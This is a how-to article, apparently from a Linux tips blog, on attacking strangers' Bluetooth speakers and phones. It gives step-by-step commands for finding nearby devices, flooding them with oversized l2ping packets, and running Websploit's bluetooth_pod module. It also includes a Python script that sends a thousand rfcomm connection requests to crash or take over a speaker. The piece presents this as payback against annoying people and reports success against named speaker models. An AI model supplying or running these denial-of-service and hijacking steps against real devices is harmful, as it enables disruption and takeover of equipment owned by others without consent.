How to Disable Someone Else’s Bluetooth Speaker: DoS Tricks Explained

By Jasper MonroeLinux Commands

DoS on Bluetooth: A Trick to Disable Someone Else’s Speaker

There aren’t many things in life that annoy almost everyone: spring and fall slush, summer hot water outages, and kids with portable Bluetooth speakers. While you can’t do much about the first two, you can actually fight back against the third—almost without breaking the law. Here’s how.

Unlike modern Wi-Fi routers that can filter unwanted packets, most Bluetooth adapters are, to put it mildly, not very smart. They don’t really care what kind of packet you send, how big it is, or how many you send. That’s why it’s easy in Linux to increase the size of a ping packet to a huge value and then send, say, 1,000 of these packets to a Bluetooth device.

Step-by-Step Guide

Finding Devices in Range

First, you need to find suitable devices within range. Use the following command:

$ hcitool scan

This will give you a list of available Bluetooth devices and their MAC addresses. If your system doesn’t detect your Bluetooth adapter, try installing a Bluetooth manager for Linux. On Kali, gnome-bluetooth works well:

$ apt-get install gnome-bluetooth

You can also use blueman:

$ apt-get install blueman

Disabling Devices: Methods

Once you have a list of potential targets, you can disrupt their Bluetooth devices in several ways. Let’s look at each method.

Method 1: l2ping

Use this command:

$ l2ping -i hci0 -s <packet value> -f <MAC_address>

This generates packets of the size you specify and sends them to the target MAC address. You’ll notice the response time in the terminal gradually increases, and the targeted device’s Bluetooth will likely disconnect. After a while, it will reconnect, but the music will be interrupted—satisfying, right?

Info: This method works especially well when the target device (like a phone) is connected to a headset or speaker via Bluetooth. After the attack, the two devices won’t be able to connect to each other.

Method 2: Websploit

There’s a more elegant way to silence a speaker blasting music. Launch Websploit:

$ websploit

In the console, enter:

$ show modules

This shows all available modules. Look for bluetooth/bluetooth_pod:

$ use bluetooth/bluetooth_pod

Set the parameters for the target device:

$ show options
$ set bdaddr <MAC_address>

To make sure the attack is effective, increase the packet size:

$ set size 999

Now, start the attack:

$ run

You’ll see similar results: pings slow down, and the music stops. Beautiful!

These two methods work on almost any Bluetooth speaker, headset, or similar device, mainly because manufacturers rarely release firmware updates that filter incoming packets. So, if you have a Linux laptop, you can call yourself the nemesis of portable speakers.

If the speaker withstands the attack, try sending packets to the phone it’s connected to. In my tests, a powerful portable speaker (JBL Xtreme) handled the load fairly well, but cheap knockoffs usually crash instantly.

About Ready-Made Jammers

You can find various signal jammers for sale online. They’re usually expensive and offer different features. Some can block almost all mobile, Wi-Fi, and Bluetooth signals at once, while others can’t even handle basic signals.

If you think you really need such a device, make sure to check your local laws before buying. In Russia, buying and selling jammers isn’t prohibited, but using one requires registration with the State Commission for Radio Frequencies (GKRCh). If you’re caught using an unregistered jammer, you’ll likely be fined under Article 13.4 of the Administrative Code. The fine is currently 500 rubles for individuals and up to 10,000 for businesses.

Connecting to Someone Else’s Device

As we’ve seen, basic speakers and headsets almost never filter the packets you send. But what happens if you send not just a ping, but a connection request? And not just one, but many?

Not all manufacturers protect their devices from buffer overflow. If all requests are queued, what happens when the buffer fills up? The speaker will try to execute the command and clear the buffer.

To do this, we use the standard Bluetooth data exchange protocol—rfcomm. Since the utility controlling the protocol won’t let you send a thousand requests manually, here’s a simple Python script to automate the process:

#!/usr/bin/env python
import subprocess

cmd=['rfcomm', 'connect', '<MAC_address>', '1']

for i in range(0, 1001):
    subprocess.call(cmd)
print('Connecting...')

Before running the script, get the device’s MAC address using hcitool scan and insert it into the script. Save and run the script:

$ python <FileName>

Whether the script works depends on the target device’s buffer speed. If the buffer fills before it’s cleared, the command will execute and you’ll connect to the speaker at the same time as the main user. If not, you’ll need to restart the script.

If successful, you can hijack the speaker or disable it. In my experiments, the JBL Xtreme shut down, and I was once able to take over a JBL Flip 2 (though I don’t have it handy now).

Leave a Reply